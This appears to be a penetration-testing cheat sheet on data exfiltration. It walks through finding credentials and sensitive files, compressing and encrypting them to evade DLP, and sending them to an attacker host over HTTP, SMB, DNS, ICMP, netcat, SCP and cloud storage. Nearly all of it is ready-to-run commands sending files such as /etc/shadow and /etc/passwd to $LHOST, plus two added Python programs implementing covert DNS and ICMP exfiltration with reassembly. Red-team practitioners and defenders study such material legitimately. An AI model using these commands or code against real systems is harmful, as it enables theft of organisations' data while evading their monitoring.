
Data Exfiltration

Data exfiltration is the unauthorized transfer of data from a compromised system to an attacker-controlled destination. Which method works depends on what protocols are allowed outbound and what inspection (proxy, DLP, DNS logging) sits in the path.

# Set environment variables
export TARGET=<ip>
export LHOST=<your-ip>
export LPORT=4444

Staging and Preparation

Before exfiltrating, stage your data to reduce transfer volume and avoid detection.

Find Interesting Data

Linux:

find / -name "*.conf" -o -name "*.bak" -o -name "*.sql" -o -name "*.kdbx" -o -name "id_rsa" 2>/dev/null
find / -name "*.txt" -o -name "*.csv" -o -name "*.xlsx" 2>/dev/null | head -50
grep -rli "password" /var/www/ /opt/ /home/ 2>/dev/null

Windows:

Get-ChildItem -Path C:\ -Include *.txt,*.pdf,*.xlsx,*.docx,*.kdbx,*.conf,*.bak -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\ -Recurse -Include *.txt,*.doc* | Select-String -Pattern "password" -List
# Select-String only sees plain text: .docx/.xlsx are zip containers and .doc is binary,
# so hits inside Office files are unreliable; expand or convert them before grepping

Compress Before Transfer

Compression reduces transfer volume and bundles many files into one. On its own it is not a way past content inspection: DLP and proxy products routinely open common archive formats, so rely on the encryption step below for that.

Linux:

tar czf /tmp/loot.tar.gz /home/ /var/backup/ /etc/shadow

Windows:

Compress-Archive -Path C:\Users\Public\loot\ -DestinationPath C:\Users\Public\loot.zip

Encrypt Before Transfer

Encryption prevents content inspection by DLP (Data Loss Prevention) and network monitoring tools, and protects the client's data if the transfer is intercepted. It does not hide the transfer itself: a large, high-entropy upload to a destination the organization has never contacted can still trigger an alert.

Linux:

# -k puts the passphrase in shell history and the process list; -pass env:VAR or -pass file:PATH avoids that
openssl enc -aes-256-cbc -pbkdf2 -in loot.tar.gz -out loot.enc -k "exfilpassword"

Decrypt on Kali:

openssl enc -aes-256-cbc -pbkdf2 -d -in loot.enc -out loot.tar.gz -k "exfilpassword"

Windows (PowerShell):

# There is no one-line encryption cmdlet (the .NET AES classes are available but verbose);
# if 7-Zip is on the box, an encrypted archive is the quickest option. -mhe=on also
# encrypts the file names, which a password-protected zip leaves readable:
7z a -p"exfilpassword" -mhe=on C:\Users\Public\loot.7z C:\loot\

HTTP / HTTPS Exfiltration

The most reliable method in most environments since HTTP/HTTPS is almost always allowed outbound.

Python Upload Server (Kali)

pip install uploadserver --break-system-packages
# server.pem must contain both the self-signed certificate and its private key; binding port 443 needs root
sudo python3 -m uploadserver 443 --server-certificate server.pem

From Linux Target

curl -X POST https://$LHOST:443/upload -F "files=@/tmp/loot.tar.gz" -k

From Windows Target

# -InFile sends the raw file as the request body, not a multipart form, so uploadserver
# (which expects a multipart field named "files") rejects it. With the server on 443 behind
# a self-signed certificate, build the form instead (PowerShell 7+):
Invoke-RestMethod -Uri https://$LHOST/upload -Method POST -Form @{files = Get-Item C:\Users\Public\loot.zip} -SkipCertificateCheck

Or using .NET WebClient (Windows PowerShell 5.1), which does build a multipart body but names the field "file"; if uploadserver answers 400 Bad Request, that field-name mismatch is the cause:

# accept the self-signed certificate for this session
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
$wc = New-Object System.Net.WebClient
$wc.UploadFile("https://$LHOST/upload", "C:\Users\Public\loot.zip")

SMB Exfiltration

If outbound SMB (port 445) is allowed, use an impacket SMB server on Kali. Current Windows builds (10 1709+ / Server 2019+) refuse guest (unauthenticated) access to SMB2 shares by default, so give the server credentials rather than relying on anonymous access:

impacket-smbserver share /home/kali/loot -smb2support -username kali -password kali

From the Windows target, map the share with those credentials, then copy files directly to it:

net use \\$LHOST\share /user:kali kali
copy C:\Users\Public\loot.zip \\$LHOST\share\loot.zip

Or recursively copy a directory:

xcopy C:\Users\Public\loot\ \\$LHOST\share\ /E /Y

DNS Exfiltration

DNS is often allowed outbound even in highly restricted environments. Data is encoded into DNS queries sent to an attacker-controlled authoritative name server.

dnscat2

On Kali (start the DNS server). For queries to reach it through the target's normal resolver, <your-domain> must be delegated (NS record) to the Kali host; otherwise the client has to reach Kali on UDP/53 directly:

dnscat2-server <your-domain>

On the target (connect back over DNS):

# direct to the server (needs UDP/53 to $LHOST allowed); "./dnscat <your-domain>" goes via the resolver instead
./dnscat --dns server=$LHOST

In the server console, attach to the session, then download files from within it:

session -i 1
download /etc/passwd /home/kali/loot/passwd

Manual DNS Exfiltration

Encode data into DNS queries (slow, but it rides along with the target's normal resolver traffic). The queried name has to end in a zone whose authoritative server you run, because it is the target's resolver, not the target, that contacts you; `$line.$LHOST` would only query a nonsense name against the target's default resolver. Prefix each label with a sequence number so the receiver can put the chunks back in order and spot gaps (resolvers cache, so an identical name repeated later is not forwarded again):

# On target — hex-encode the file (xxd -p emits 60-char lines, under the 63-octet label limit),
# number the lines, and leak each one as a query for <seq>.<hex>.<your-domain>
xxd -p /etc/passwd | nl -n rz -w 4 -s . | while read line; do nslookup "$line.<your-domain>" >/dev/null; done

# If the target can reach $LHOST on UDP/53 directly, point nslookup at it instead of the default resolver
xxd -p /etc/passwd | nl -n rz -w 4 -s . | while read line; do nslookup "$line.<your-domain>" $LHOST >/dev/null; done

On Kali, capture UDP/53 with tcpdump or read your authoritative server's query log, then strip the domain, sort by sequence number, drop duplicates and feed the hex to xxd -r -p.

warning

DNS exfiltration is very slow: a name is at most 253 characters in total and each label at most 63, so after hex or base32 expansion each query carries only a hundred-odd bytes of payload. Resolver caching and query rate limits slow it further, and a burst of long, high-entropy subdomains under one zone is exactly what DNS-monitoring products alert on. Use it when other channels are blocked, not as a primary method.
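
The receiving side of the manual method above is where the work is: queries arrive out of order, retransmitted and mixed with unrelated lookups. The following is an added example, not code from the original page or from dnscat2, that does both halves: it splits a file into query names that respect the label and name limits and rebuilds the file from whatever names the authoritative server logged. It assumes a hypothetical attacker-controlled zone x.example, and the sample data is constructed. It uses base32 rather than base64 because resolvers may rewrite the case of a name (0x20 encoding), and it appends an end marker carrying the chunk count and a short digest so the receiver knows when the transfer is complete and intact.

```python
"""Chunk a file into DNS query names and rebuild it from the names the attacker's
name server saw.  Added example, not from the original page or from dnscat2.

Assumptions (hypothetical): the attacker is authoritative for EXFIL_DOMAIN and can
read every query name for that zone (tcpdump, BIND query log, dnscat2 console).
The sample data below is constructed, not a real /etc/passwd."""
import base64
import hashlib
import random
from typing import Dict, List, Optional, Tuple

EXFIL_DOMAIN = "x.example"  # hypothetical attacker-controlled zone
MAX_LABEL = 63              # RFC 1035 label limit (octets)
MAX_NAME = 253              # RFC 1035 limit for the whole presentation-format name
SEQ_WIDTH = 6               # zero-padded sequence label, e.g. 000042


def _b32(data: bytes) -> str:
    # Resolvers may change the case of names (0x20 encoding), so base64 is unsafe;
    # base32 is case-insensitive.  '=' is not a legal label character, so drop it.
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode(data: bytes, domain: str = EXFIL_DOMAIN) -> List[str]:
    """Return the query names, in order, that carry `data`.
    Each name is <seq>.<label>[.<label>...].<domain>, followed by one end marker
    end.<count>.<digest>.<domain> so the receiver knows when it has everything."""
    payload = _b32(data)
    budget = MAX_NAME - len(domain) - SEQ_WIDTH - 2        # room left for data labels and their dots
    labels_per_name = max(1, budget // (MAX_LABEL + 1))
    per_name = labels_per_name * MAX_LABEL
    names = []
    for seq, off in enumerate(range(0, len(payload), per_name)):
        piece = payload[off:off + per_name]
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        names.append(f"{seq:0{SEQ_WIDTH}d}." + ".".join(labels) + "." + domain)
    digest = _b32(hashlib.sha256(data).digest()[:8])
    names.append(f"end.{len(names):0{SEQ_WIDTH}d}.{digest}.{domain}")
    return names


def decode(seen: List[str], domain: str = EXFIL_DOMAIN) -> Tuple[Optional[bytes], List[int]]:
    """Rebuild the file from query names in any order, with duplicates (retransmits)
    and unrelated queries mixed in.  Returns (data, missing_seqs); data is None while
    chunks or the end marker are missing.  Raises ValueError on a digest mismatch."""
    suffix = "." + domain.lower()
    chunks: Dict[int, str] = {}
    total: Optional[int] = None
    digest = ""
    for name in seen:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue                                   # not our zone
        labels = name[:-len(suffix)].split(".")
        if labels[0] == "end" and len(labels) == 3 and labels[1].isdigit():
            total, digest = int(labels[1]), labels[2]
        elif labels[0].isdigit():
            chunks[int(labels[0])] = "".join(labels[1:])   # duplicates carry identical data
    if total is None:
        return None, []
    missing = [i for i in range(total) if i not in chunks]
    if missing:
        return None, missing
    data = _unb32("".join(chunks[i] for i in range(total)))
    if _b32(hashlib.sha256(data).digest()[:8]) != digest:
        raise ValueError("digest mismatch: a chunk was truncated or altered in transit")
    return data, []


if __name__ == "__main__":
    sample = b"root:x:0:0:root:/root:/bin/bash\n" * 20      # constructed stand-in for /etc/passwd
    names = encode(sample)
    seen = names * 2                                        # what the server log shows: retransmits...
    random.shuffle(seen)                                    # ...and arrival order is not send order
    data, missing = decode(seen)
    assert data == sample and not missing
    print(f"{len(names)} queries, longest name {max(map(len, names))} chars")
```

On the target, the names from encode() are issued with nslookup or dig exactly as in the loop above; on Kali, decode() takes the list of queried names however you collected them. The missing-sequence list is what tells you which queries to repeat, which the bare hex loop cannot do.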


ICMP Exfiltration

ICMP echo requests (ping) can carry arbitrary data in the payload field. Useful when only ICMP is allowed outbound.

Manual ICMP Data Transfer

On Kali, capture only the echo requests (your own echo replies would otherwise duplicate every payload in the capture). tun0 assumes a VPN lab interface; use whichever interface faces the target:

sudo tcpdump -i tun0 'icmp[icmptype] == icmp-echo' -w icmp_capture.pcap

On the Linux target, embed data in ping payloads. ping -p takes at most 16 pattern bytes (32 hex characters), hence -c 16 on xxd:

xxd -p -c 16 /etc/passwd | while read line; do ping -c 1 -p "$line" $LHOST; done

Extract data from the pcap on Kali (tr removes the colons that older tshark versions print between bytes):

tshark -r icmp_capture.pcap -Y "icmp.type == 8" -T fields -e data.data | tr -d ':\n' | xxd -r -p

Check the result against the source before trusting a whole transfer: ping repeats the pattern to fill the default 56-byte payload and iputils ping writes a send timestamp into the leading payload bytes, so the raw data field is not a clean copy of your hex and needs trimming, and the final line of the file (fewer than 16 bytes) is padded by the same repetition. Compare the hex tshark prints for one packet with its xxd line first and adjust the extraction accordingly.
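
The ping -p route is limited to 16 pattern bytes per packet and leaves the reassembly to guesswork; building the ICMP messages yourself removes both problems. The following is an added example, not code from the original page: it packs file chunks into echo requests with a correct RFC 1071 checksum, uses the ICMP sequence field for ordering and an empty packet as end marker, and rebuilds the file from captured ICMP messages in any order while ignoring other people's pings and corrupt packets. The identifier 0x1337 and the 1024-byte chunk size are hypothetical choices, the sample data is constructed, and the raw-socket sender needs root and is only shown, not exercised.

```python
"""Build ICMP echo requests that carry file chunks and rebuild the file from a
capture.  Added example, not from the original page.  The sender needs
root/CAP_NET_RAW for a raw socket and is only shown, not run; demo data is constructed."""
import socket
import struct
from typing import Dict, List, Optional, Tuple

ICMP_ECHO_REQUEST = 8
CHUNK = 1024          # file bytes per packet (hypothetical; keep under path MTU minus 28 bytes of IP+ICMP header)
DEFAULT_ID = 0x1337   # ICMP identifier that marks our packets apart from ordinary pings (hypothetical)


def checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum; evaluates to 0 over a packet whose checksum field is filled in."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo(ident: int, seq: int, payload: bytes) -> bytes:
    """Echo request: type(1) code(1) checksum(2) identifier(2) sequence(2) payload."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def parse_echo(packet: bytes) -> Optional[Tuple[int, int, bytes]]:
    """(identifier, sequence, payload) for a well-formed echo request, else None."""
    if len(packet) < 8:
        return None
    typ, code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    if typ != ICMP_ECHO_REQUEST or code != 0 or checksum(packet) != 0:
        return None
    return ident, seq, packet[8:]


def encode_file(data: bytes, ident: int = DEFAULT_ID) -> List[bytes]:
    """Sequence numbers 0..n-1 carry the chunks; an empty packet with sequence n marks the end.
    The sequence field is 16 bits, so this covers files up to about 65535 * CHUNK bytes."""
    chunks = [data[i:i + CHUNK] for i in range(0, len(data), CHUNK)]
    if len(chunks) >= 0xFFFF:
        raise ValueError("file too large for a 16-bit sequence number; raise CHUNK")
    packets = [build_echo(ident, seq, c) for seq, c in enumerate(chunks)]
    packets.append(build_echo(ident, len(chunks), b""))
    return packets


def reassemble(packets: List[bytes], ident: int = DEFAULT_ID) -> Tuple[Optional[bytes], List[int]]:
    """Rebuild the file from captured ICMP messages in any order, skipping packets that are
    not ours (other identifier, echo replies, bad checksum).  Returns (data, missing_seqs);
    data is None while the end marker or any chunk is still missing."""
    got: Dict[int, bytes] = {}
    end: Optional[int] = None
    for p in packets:
        parsed = parse_echo(p)
        if parsed is None or parsed[0] != ident:
            continue
        _, seq, payload = parsed
        if payload == b"":
            end = seq
        else:
            got[seq] = payload
    if end is None:
        return None, []
    missing = [s for s in range(end) if s not in got]
    if missing:
        return None, missing
    return b"".join(got[s] for s in range(end)), []


def send_raw(packets: List[bytes], dst: str) -> None:
    """Sender side (needs root/CAP_NET_RAW).  With SOCK_RAW + IPPROTO_ICMP the kernel adds the IP header.
    On Kali, capture with: sudo tcpdump -i tun0 'icmp[icmptype] == icmp-echo' -w icmp_capture.pcap"""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) as s:
        for p in packets:
            s.sendto(p, (dst, 0))


if __name__ == "__main__":
    sample = b"root:x:0:0:root:/root:/bin/bash\n" * 100     # constructed stand-in for a staged file
    pkts = encode_file(sample)
    noise = build_echo(0x0001, 1, b"ordinary ping")            # someone else's ping, ignored
    data, missing = reassemble(pkts[::-1] + [noise])
    assert data == sample and not missing
    print(f"{len(pkts)} packets, first one {len(pkts[0])} bytes")
```

reassemble() wants the ICMP message bytes (header plus payload) of each captured frame; strip the link-layer and IP headers with whichever pcap reader you prefer. Keep the chunk size below the path MTU: a fragmented echo request that loses one fragment loses the whole packet, and missing_seqs tells you which ones to resend.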

Netcat / Reverse Connection

Simple TCP transfer when a direct connection is possible.

Start a listener on Kali:

nc -nlvp 9999 > loot.tar.gz

From the Linux target (the sender can hang after EOF; -q 1 on traditional netcat, or -N on the OpenBSD build, makes it exit):

nc -nv $LHOST 9999 < /tmp/loot.tar.gz

From a Windows target (if nc.exe is available; run it from cmd.exe, since PowerShell has no < input redirection):

nc.exe $LHOST 9999 < C:\Users\Public\loot.zip

Netcat gives no completion signal, so compare a hash of the received file (sha256sum on Kali, Get-FileHash or sha256sum on the target) with the original before cleaning up.

SCP / SFTP (If SSH is Available)

Pushing from the target needs an SSH server listening on Kali (it is installed but not started by default); pulling needs SSH access to the target.

From the target to Kali:

scp /tmp/loot.tar.gz kali@$LHOST:/home/kali/loot/

From Kali pulling from the target (use the account you have on the target; $USER would expand to your Kali user):

scp <target-user>@$TARGET:/tmp/loot.tar.gz /home/kali/loot/

Base64 Over Existing Channel

When no new outbound connections are possible but you have an interactive shell (bind shell, web shell, etc.), encode files and copy/paste through the existing session.

On the target:

base64 -w 0 /etc/shadow

Or on Windows:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\Public\loot.zip"))

Copy the output, then decode on Kali:

echo '<base64-output>' | base64 -d > loot
tip

For large files, split the base64 text into numbered chunks (split -l on the encoded output, or paste a few hundred lines at a time), transfer them separately, concatenate them in order and decode. Then compare a hash of the decoded file against one taken on the target (sha256sum / Get-FileHash): terminals silently wrap or drop characters, and a single lost character desynchronizes everything after it. This is tedious but works when nothing else does.


Cloud Storage Exfiltration

If the target has access to cloud services (OneDrive, Google Drive, Dropbox, AWS S3), you can upload data through legitimate channels that are unlikely to be blocked.

AWS CLI (If Credentials Are Available)

aws s3 cp /tmp/loot.tar.gz s3://your-bucket/loot.tar.gz

PowerShell to Cloud API

Upload to a pre-signed S3 URL:

Invoke-RestMethod -Uri "https://your-bucket.s3.amazonaws.com/upload?presigned-params" -Method PUT -InFile C:\loot.zip
warning

Using the target organization's own cloud credentials for exfiltration leaves an audit trail tied to their account. Use your own infrastructure when possible.


Exfiltration Checklist

  1. Identify what data is valuable before collecting everything
  2. Stage and compress data to minimize transfer volume
  3. Encrypt sensitive data before exfiltration (prevents content inspection and protects your client's data in transit)
  4. Test your exfiltration method with a harmless file before sending real data
  5. Monitor for DLP alerts: if transfers start failing, the blue team may have flagged your activity
  6. Verify the received copy against a hash taken on the target, then clean up staged files
  7. Document exactly what was exfiltrated, where it went and when (required for engagement reporting)